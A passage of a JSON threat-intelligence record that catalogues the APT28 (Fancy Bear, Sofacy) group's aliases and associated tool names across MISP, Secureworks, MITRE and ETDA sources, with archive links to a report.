				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775446588,
	"ts_updated_at": 1775792269,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0390b2659dd3307a0145bbf3a01baecb0c2219ef.pdf",
		"text": "https://archive.orkl.eu/0390b2659dd3307a0145bbf3a01baecb0c2219ef.txt",
		"img": "https://archive.orkl.eu/0390b2659dd3307a0145bbf3a01baecb0c2219ef.jpg"
	}
}